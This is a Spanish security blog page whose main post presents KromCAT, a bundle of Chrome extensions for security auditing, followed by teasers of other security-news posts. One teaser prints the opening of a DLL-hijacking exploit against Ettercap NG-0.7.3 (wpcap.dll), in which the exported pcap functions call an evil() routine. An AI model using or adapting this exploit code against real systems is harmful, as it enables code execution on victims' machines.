¡La Informática al límite!
KromCAT: Convierte Chrome en una herramienta de auditorías
Hace algún tiempo os presenté Mantra. Un navegador basado en Mozilla Firefox y que se combinaba con el proyecto FireCAT para convertirlo en una potente herramienta para realizar auditorías de seguridad, pero como es mejor tener una lista de dónde elegir, hoy os vengo a presentar el proyecto KromCAT.
KromCAT es un conjunto de extensiones para el navegador Google Chrome especialmente diseñado para realizar auditorías de seguridad. Actualmente se encuentra en la versión 1.0 Beta y contiene más de 38 extensiones divididas en 7 categorías ( Ver imagen ).
KromCAT (HTML)
KromCAT (FreeMind)
| Este artículo fue publicado por WindHack el 24 julio, 2011 a las 1:03 PM, y está archivado en Inseguridad Informática. Sigue las respuestas a esta entrada a través de RSS 2.0. Puedes dejar un comentario o enviar un trackback desde tu propio sitio. |
Aún no hay comentarios.
Aún no hay trackbacks.
Ettercap NG-0.7.3 DLL Exploit
hace 1 mes - No hay comentarios
———————————————————————- Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll) Autor: $ slashdot Testeado: Windows XP SP3 Extensión Vulnerable: .pcap ———————————————————————- #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void pcap_findalldevs() { evil(); } DLLIMPORT void pcap_close() { evil(); } DLLIMPORT void pcap_compile() { evil(); } DLLIMPORT void pcap_datalink() { evil(); } DLLIMPORT void pcap_datalink_val_to_description()…
¡Lanzado el Nmap 5.51!
hace 5 meses - No hay comentarios
Hace poco salió la ultima versión de Nmap, una de las herramientas que cualquier persona interesada por la seguridad informática debe conocer y utilizar. Algunas de las mejoras en la versión 5.51 Soporte para el protocolo Gopher Añadidos 177 NSE scripts 2,982 OS fingerprints añadidos 7,319 firmas de versiones agregadas Inclusión de la nueva herramienta NCAT y…
IntyPedia: Enciclopedia visual de la seguridad de la información
hace 5 meses - No hay comentarios
Intypedia es una enciclopedia visual de la seguridad de la información. El proyecto persigue difundir conocimientos sobre esta temática mediante lecciones en vídeo desarrolladas por destacados expertos usando un lenguaje accesible por un amplio público. La enciclopedia abarca temas como la criptografía, la seguridad en redes, el malware, la seguridad web, entre otros. Las lecciones publicadas…
Wapiti – Web application vulnerability scanner
hace 7 meses - 1 comentario
Wapiti es una aplicación que permite auditar la seguridad de sus aplicaciones web. No estudia el código fuente de la aplicación, pero va a escanear las páginas web de la webapp, en busca de scripts y de formas en las que se puedan inyectar datos. Posteriormente, Wapiti actúa como un fuzzer, inyectando payloads para ver si es vulnerable.…
Cross Site Scripting en jQuery 1.6
hace 8 meses - No hay comentarios
Se ha arreglado una vulnerabilidad que permitía realizar ataques Cross Site Scripting (XSS) en jQuery 1.6. La vulnerabilidad podía ser explotada en ciertos sitios que utilizaran la variable ‘location.hash’ en un contexto que no fuera el de Cascading Style Sheets (CSS). jQuery es una biblioteca o framework javascript de software libre y código abierto. Es compatible con la mayoría…
Fallo en facebook que permite apropiación de páginas creadas
hace 8 meses - No hay comentarios
El portal Naked Security ha detectado un fallo en el sistema de administración de las páginas de facebook, que podría comprometer la autoridad de los creadores originales. Según el portal especializado en seguridad de Sophos, se ha demostrado un fallo en el sistema que permitiría a los usuarios elevados a administradores eliminar a los…
Instalar TOR y navegar a través de él en Chrome
hace 9 meses - 4 comentarios
TOR (The Onion Router) es un sistema que permite navegar de forma anónima en Internet. Está diseñado para ser resistente a análisis de tráfico, por lo cual, al usar TOR es posible realizar una conexión a otro equipo sin que este -u otro- tenga posibilidad de saber el número IP de origen de la conexión. En este…
Presentaciones de la Defcon19 (2011)
hace 9 meses - No hay comentarios
Fueron publicadas las presentaciones de la DefCon19. Están en inglés, obviamente, y algunas son bastante complejas si no estás en la explicación, pero de igual forma, encontrarás varias entretenidas. ¡Échale un vistazo! File or Directory Name Size (Units) dc-19-program.pdf (19.01 MiB) DEFCON-19-Abstrct-The-Schemaverse-Guide.pdf (592.27 KiB) DEFCON-19-Abstrct-The-Schemaverse.pdf (993.54 KiB) DEFCON-19-Almeida-Workshop-ESD.pdf (1.85 MiB) DEFCON-19-Alonso-Garrido-DUST.pdf (1.78 MiB) DEFCON-19-Alonso-Garrido-Excel.pdf…
Sitio web ideal para obtener el clima de una ciudad
hace 9 meses - No hay comentarios
Pues bueno, navegando un poco con DuckDuckGo me encontré que al escribir el goodie “temp in [Ciudad]” daba los datos climáticos del momento. Mirando ese resultado, pude ver que los datos los da gracias al sitio WorldWeatherOnline, y sin más rodeos le eché un vistazo y realmente me agradó, ya que da una información bastante fiable y concreta.…
Google+, la red social de Google
hace 10 meses - No hay comentarios
Se había especulado durante tantos meses -años- sobre si Google iba a lanzar su propia red social, que cuando supimos que tan sólo iba a lanzar una especie de “capa social”, decepcionó un poco. En las últimas semanas habíamos dejado de oír del proyecto social de Google, y hoy, por sorpresa, lo ha dado a…
